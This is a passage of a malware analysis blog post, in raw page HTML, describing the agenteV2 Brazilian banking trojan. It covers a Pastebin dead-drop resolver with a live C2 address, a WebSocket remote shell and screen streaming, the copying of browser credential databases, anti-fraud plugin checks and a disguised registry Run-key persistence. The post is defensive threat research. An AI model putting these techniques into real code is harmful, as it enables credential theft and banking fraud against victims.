data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        File Size\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        27,430,848 bytes (~27 MB) statically linked dependencies +\u00a0Nuitka\u00a0runtime bloat\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        MD5\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        826d6350724f203b911aa6c8c4626391\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Bytecode\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        None not extractable; full native RE\u00a0required\u00a0(IDA Pro \/\u00a0Ghidra)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        RE Difficulty\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        High ~90% of code is\u00a0Nuitka\u00a0boilerplate +\u00a0CPython\u00a0internals; malicious logic is a small fraction\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Classification\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Interactive Banking Trojan + Information Stealer not a passive\u00a0exfiltrator\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Name (internal)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        agenteV2 'V2' implies prior version in circulation; active development confirmed\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        OpSec\u00a0quality\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Poor verbose debug strings, original variable\/function names, and cleartext URLs left intact\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-298'>\ntable#wpdtSimpleTable-298{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-298 td, table.wpdtSimpleTable298 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<p>Despite robust&nbsp;Nuitka&nbsp;compilation, the threat actor&nbsp;failed to&nbsp;strip debug symbols, variable names, and&nbsp;cleartext&nbsp;strings from the binary exposing the full execution flow via static .rdata&nbsp;analysis. This is a recurring pattern in Brazilian malware: technically capable packaging decisions paired with poor operational security discipline.&nbsp;<br>&nbsp;<br><strong>Core Capabilities (Reconstructed from Static + Dynamic Analysis):&nbsp;<\/strong>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"689\" height=\"143\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_7.png\" alt=\"\" class=\"wp-image-20440\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_7.png 689w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_7-300x62.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_7-370x77.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_7-270x56.png 270w\" sizes=\"(max-width: 689px) 100vw, 689px\" \/><figcaption class=\"wp-element-caption\"><em>agenteV2_historico_detect.dll .rdata: parsing string, banking target arrays, anti-fraud product paths<\/em><\/figcaption><\/figure>\n\n\n\n<p>The malware does not hardcode the C2 address. It queries a Pastebin URL to dynamically retrieve the active C2 IP and port, enabling infrastructure rotation without redeployment:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Dead-Drop URL:  https:\/\/pastebin.com\/raw\/0RmxqY57 \nResolved C2:    38.242.246.176:8443 <\/code><\/pre>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-299\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"6\"\n           data-wpID=\"299\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:41.943127962085%;                    padding:10px;\n                    \"\n                    >\n                                        String (.rdata)\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:18.601895734597%;                    padding:10px;\n                    \"\n                    >\n                                        Address\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:39.454976303318%;                    padding:10px;\n                    \"\n                    >\n                                        Role\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        a PASTEBIN_URL\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        0x1812987ED\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Variable storing the dead-drop URL\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        <a href=\"https:\/\/pastebin.com\/raw\/0RmxqY57\u00a0\" target=\"_blank\">https:\/\/pastebin.com\/raw\/0RmxqY57\u00a0<\/a>                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        0x1812993F0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hardcoded Pastebin raw URL\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Busca\u00a0IP e Porta\u00a0Base do\u00a0Pastebin.\u00a0Retorna\u00a0(ip, port)\u00a0ou\u00a0None\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        0x18129889B\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Resolver function docstring returns (ip, port) tuple\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Erro: Porta no\u00a0pastebin\u00a0n...\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        0x18129884C\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Error handler: malformed port in Pastebin content\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Erro\u00a0ao\u00a0ler\u00a0Pastebin:\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        0x181298881\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000014\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Error handler: Pastebin fetch failure\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-299'>\ntable#wpdtSimpleTable-299{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-299 td, table.wpdtSimpleTable299 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n<\/style>\n\n\n\n\n<h4 class=\"wp-block-heading\"><em>4.1.&nbsp;Persistent WebSocket Backdoor Interactive Agent<\/em>&nbsp;<\/h4>\n\n\n\n<p>Unlike typical stealers that perform a single HTTP POST exfiltration and&nbsp;terminate, agenteV2 establishes a persistent WebSocket connection (uws:\/\/ scheme) to the C2. This architecture enables real-time, bidirectional communication making it function as a full interactive backdoor rather than a passive stealer:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Continuous screen capture stream using PIL (Pillow) and&nbsp;mss&nbsp;libraries frames encoded as JPEG and streamed live to the&nbsp;operator;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Interactive remote shell via&nbsp;CMD:SHELL: command prefix commands dispatched through&nbsp;subprocess.Popen, output returned over the&nbsp;WebSocket;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Real-time telemetry: live operator visibility into the victim&#8217;s desktop session.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>This design is&nbsp;optimized&nbsp;for manual, real-time financial fraud.&nbsp;The&nbsp;operator can watch the&nbsp;victim&#8217;s&nbsp;screen, interact with open banking sessions, and issue commands on the fly.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"946\" height=\"134\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_8.png\" alt=\"\" class=\"wp-image-20445\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_8.png 946w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_8-300x42.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_8-768x109.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_8-370x52.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_8-270x38.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_8-740x105.png 740w\" sizes=\"(max-width: 946px) 100vw, 946px\" \/><figcaption class=\"wp-element-caption\"><em>IDA Pro \/ strings uws:\/\/ WebSocket scheme string,&nbsp;CMD:SHELL: command prefix,&nbsp;subprocess.Popen&nbsp;references in .rdata<\/em><\/figcaption><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\"><em>4.2. Evasive Browser Credential Harvesting<\/em>&nbsp;<\/h4>\n\n\n\n<p>The stealer targets all Chromium-based browsers (Chrome, Edge, Brave, Opera) across all user profiles. To bypass the SQLite file lock&nbsp;maintained&nbsp;by running browsers, it uses&nbsp;shutil.copyfile&nbsp;to duplicate the target database files into %TEMP% before executing SQL SELECT queries:&nbsp;&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Target files: Login Data, Cookies, History  \n\nMethod: shutil.copyfile(src, %TEMP%&lt;random&gt;) \u2192 sqlite3.connect(copy) \u2192 SELECT * FROM logins <\/code><\/pre>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-300\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"3\"\n           data-wpID=\"300\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:45.407098121086%;                    padding:10px;\n                    \"\n                    >\n                                        String (.rdata)\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:12.004175365344%;                    padding:10px;\n                    \"\n                    >\n                                        Address\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:42.58872651357%;                    padding:10px;\n                    \"\n                    >\n                                        Capability\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Varre\u00a0todos\u00a0os\u00a0perfis\u00a0de\u00a0navegadores\u00a0e\u00a0busca\u00a0Inter\/Stone no disco\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        0x18129845A\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Scans all browser profiles for Inter and Stone bank data\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        clonando\u00a0o banco para\u00a0ler\u00a0mesmo\u00a0se\u00a0aberto\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        0x181298976D\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Explicit DB cloning to bypass file lock while browser is running\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-300'>\ntable#wpdtSimpleTable-300{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-300 td, table.wpdtSimpleTable300 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h4 class=\"wp-block-heading\"><em>4.3.&nbsp;Security Controls &amp; Anti-Fraud Enumeration<\/em>&nbsp;<\/h4>\n\n\n\n<p>The malware proactively profiles the host for regional anti-fraud and endpoint protection solutions before&nbsp;proceeding&nbsp;with credential theft a strong indicator of deliberate LATAM targeting:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Diebold Warsaw (Warsaw Security Module) disk path queries for this&nbsp;widely-deployed&nbsp;Brazilian banking security&nbsp;plugin;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GbPlugin&nbsp;disk path queries for this browser security plugin used by major Brazilian banks.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Detection of these solutions&nbsp;likely influences&nbsp;the&nbsp;malware&#8217;s&nbsp;behavior (evasion, delayed execution, or alternate attack paths).&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"758\" height=\"315\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_9.png\" alt=\"\" class=\"wp-image-20454\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_9.png 758w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_9-300x125.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_9-370x154.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_9-270x112.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_9-740x308.png 740w\" sizes=\"(max-width: 758px) 100vw, 758px\" \/><figcaption class=\"wp-element-caption\"><em>Diebold Warsaw and&nbsp;GbPlugin&nbsp;path references used for security controls enumeration<\/em><\/figcaption><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\"><em>4.4. Analyst Assessment<\/em>&nbsp;<\/h4>\n\n\n\n<p>agenteV2 is not a passive, fire-and-forget stealer. It is a purpose-built interactive agent designed for real-time manual financial fraud in the Brazilian market. The WebSocket architecture, live screen streaming, and remote shell capability are consistent with an operator-assisted attack flow: the threat actor watches the&nbsp;victim&#8217;s&nbsp;screen in real time, waits for a banking session to open, and interacts directly.&nbsp;&nbsp;<\/p>\n\n\n\n<p>The&nbsp;Nuitka&nbsp;compilation&nbsp;demonstrates&nbsp;meaningful anti-analysis effort; however, the failure to strip debug strings, variable names, and cleartext URLs reveals the full implementation to any analyst with access to the binary a significant&nbsp;OpSec&nbsp;failure that partially undermines the obfuscation investment.&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><em>4.5.&nbsp;Persistence Mechanisms<\/em>&nbsp;<\/h4>\n\n\n\n<p>The payload&nbsp;establishes&nbsp;a third persistence layer independently of the VBS loader:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \n\nValue: MonitorSystem \n\nData: C:\\Users\\admin\\AppData\\Local\\Temp\\ONEFIL~1\\agenteV2_historico_detect.py <\/code><\/pre>\n\n\n\n<p>Note: the Registry Run value points to a .py&nbsp;file in %TEMP% this assumes either Python is installed and registered as a handler for .py&nbsp;files on the victim machine, or represents an implementation error by the threat actor (a common characteristic of amateur-but-functional malware). The name &#8216;MonitorSystem&#8217; is social engineering for any victim who opens regedit.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"673\" height=\"177\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_10.png\" alt=\"\" class=\"wp-image-20459\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_10.png 673w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_10-300x79.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_10-370x97.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_10-270x71.png 270w\" sizes=\"(max-width: 673px) 100vw, 673px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN Registry modification event: HKCU\\Run\\MonitorSystem&nbsp;key creation by wifi_driver.exe process<\/em><\/figcaption><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">5. Stage 3 C2 Communication&nbsp;<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><em>5.1. Dead-Drop Resolver via Pastebin<\/em>&nbsp;<\/h4>\n\n\n\n<p>agenteV2 does not hardcode the C2 IP. Instead, it implements a Pastebin-based dead-drop resolver allowing the threat actor to rotate C2 infrastructure without recompiling or redelivering the malware:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"548\" height=\"210\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_11.png\" alt=\"\" class=\"wp-image-20460\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_11.png 548w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_11-300x115.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_11-370x142.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_11-270x103.png 270w\" sizes=\"(max-width: 548px) 100vw, 548px\" \/><figcaption class=\"wp-element-caption\"><em>Browser pastebin.com\/raw\/0RmxqY57 raw content showing plaintext C2 address: 38.242.246.176 8443<\/em>&nbsp;<\/figcaption><\/figure>\n\n\n\n<p>The resolver (documented in DLL strings as &#8216;Busca&nbsp;IP e Porta Base do Pastebin.&nbsp;Retorna&nbsp;(ip, port)&nbsp;ou&nbsp;None&#8217;) parses the Pastebin content to extract the IP and port as a tuple, with explicit error handling for fetch failures and malformed content.&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><em>5.2. Beacon Pattern&nbsp;<\/em><\/h4>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-301\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"7\"\n           data-wpID=\"301\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:16.107382550336%;                    padding:10px;\n                    \"\n                    >\n                                        Parameter\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:83.892617449664%;                    padding:10px;\n                    \"\n                    >\n                                        Value\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Beacon interval\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ~60 seconds (observed\u00a0timestamps: +587ms, +61334ms, +121688ms, +182127ms, +242703ms...)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Bytes sent\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        524 bytes per beacon (fixed size structured check-in payload)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Bytes received\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ~1 KB per beacon (task\/command response)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                 